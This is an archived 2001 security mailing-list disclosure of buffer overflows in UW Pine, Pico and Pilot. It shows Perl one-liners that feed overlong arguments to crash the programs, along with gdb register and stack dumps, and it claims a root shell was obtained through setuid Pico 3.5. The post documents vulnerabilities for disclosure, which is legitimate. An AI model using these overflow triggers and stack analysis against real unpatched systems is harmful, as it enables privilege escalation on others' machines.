OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: uexploit xeightwo (xploithackermail.com)
Date: Wed Nov 28 2001 - 05:54:09 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

     Pine, Pico, Pilot Program Overflow bug.

     Could find overflow limitation of similar way in several versions
     as result that I investigate pine program.

     What is PINE? Pine(Program for Internet News & Email) has powerful function
     and various Configuration option as Unix mail program (Mail User Agent),
     that develop in University of Washington.

     With Pico (message composition editor) that is loved by text editer,
     Pine includes Pilot (file browser) that is used as file browser.

     For further information, visit the Pine Information Center at
     URL: http://www.washington.edu/pine/
     download URL: ftp://ftp.cac.washington.edu/pine/

     Limitation that find:

     - Pico frame pointer overflow: --------------------------------------------------|
     
     URL: http://my.dreamwiz.com/hackingm/lecture/pico.txt

     Pico version that I did testing is 3.5.

     Anyway, overflow limitation does not happen from pico 3.8 versions.
     When editer comes out, persuade storage in other name. (file name is long)

     Only, tested in linux 6.x box two servers that I'm using ...
     Two servers' pico version could be all 3.5,
     and execute all Rootshell as result that establish setuid bit.

     Reference examination URL: http://my.dreamwiz.com/hackingm/test.txt

     ---------------------------------------------------------------------------------|

     Could find limitation that is very similar with above attack and happen as absurd.
     The program was Pilot and Pine.

     I received current edition through ftp service download.
     It consisted of binary.

     download URL: ftp://ftp.cac.washington.edu/pine/unix-bin/

     0x01. Pilot Program bug testing:

     [x82testsub /tmp]$ ls -al pilot-bin.linux
     -rwxr-xr-x 1 x82 x82 493976 Nov 28 18:31 pilot-bin.linux
     [x82testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x616'`
     [ File name too long: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
     
     [x82testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x617'`
     Segmentation fault
     [x82testsub /tmp]$ whereis pilot
     pilot: /usr/bin/pilot /usr/man/man1/pilot.1
     [x82testsub /tmp]$
     [x82testsub /tmp]$ gdb -q /usr/bin/pilot
     (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x237'`
     [ File not found: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
     (no debugging symbols found)...t `perl -e 'print "x"x237'`
     Program received signal SIGSEGV, Segmentation fault.
     0x40057272 in ?? ()
     (gdb) info reg
     eax 0xffffff26 -218
     ecx 0x0 0
     edx 0x40144c60 1075072096
     ebx 0x78787878 2021161080
     esp 0xbffff808 0xbffff808
     ebp 0x4 0x4
     esi 0x78787878 2021161080
     edi 0x78787878 2021161080
     eip 0x40057272 0x40057272
     eflags 0x10246 66118
     cs 0x23 35
     ss 0x2b 43
     ds 0x2b 43
     es 0x2b 43
     fs 0x0 0
     gs 0x0 0
     (gdb)

     For reference, it is all same UW PILOT 2.0 versions.

     0xbffff4e0: 0x3a646e75 0x78782220 0x78787878 0x78787878
     ~~~ ... ~~~ 0x78787878 0x78787878 0x78787878 0x78787878
     0xbffff5d0: 0x22787878 0xbffff800 0x0804a089 0xbffff8e8

     (gdb) x $esp
     0xbffff804: 0x40057270
     (gdb)

     (ebp) 0xbffff800 + 0x00000004 = 0xbffff804 (esp)
           0xbffff804 -------------> 0x40057270 (eip)

     0x02. Pine Program bug testing:

     Limitation did not happen in PINE 4.42 that is new version happily.
     The following is PINE 4.10 versions that I'm using.

     [x82testsub /tmp]$ whereis pine
     pine: /usr/bin/pine /usr/man/man1/pine.1
     [x82testsub /tmp]$ pine `perl -e 'print "x"x50000'`
     Segmentation fault
     [x82testsub /tmp]$

     Let's test other version.
     The following tested in PINE 4.30 versions.

     bash$ gdb -q pine
     (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x50000'`
     (gdb) r
     Starting program: /usr/bin/pine `perl -e 'print "x"x50000'`

     (no debugging symbols found)...(no debugging symbols found)...
     Program received signal SIGSEGV, Segmentation fault.
     0x40295c99 in chunk_free (ar_ptr=0x40336f60, p=0x83488c0) at malloc.c:3121
     3121 malloc.c: No such file or directory.
     (gdb)

     Also, can see that Segfault gets up.
     Think impatiently that it is no time composure to me.
     Version did not afford to test since 4.30.

     It desires that other persons do. :-D

     Author: Xpl017Elz
     E-mail: szoahchotmail.com & xploithackermail.com
     Home: http://x82.i21c.net

     P.S: Always so ...
          Sorry. I gave up original English.
          Study English since next time. So, make understood other people.
          Thank you for reading unwise writing. ^-^* 

    -- 

    Powered by Outblaze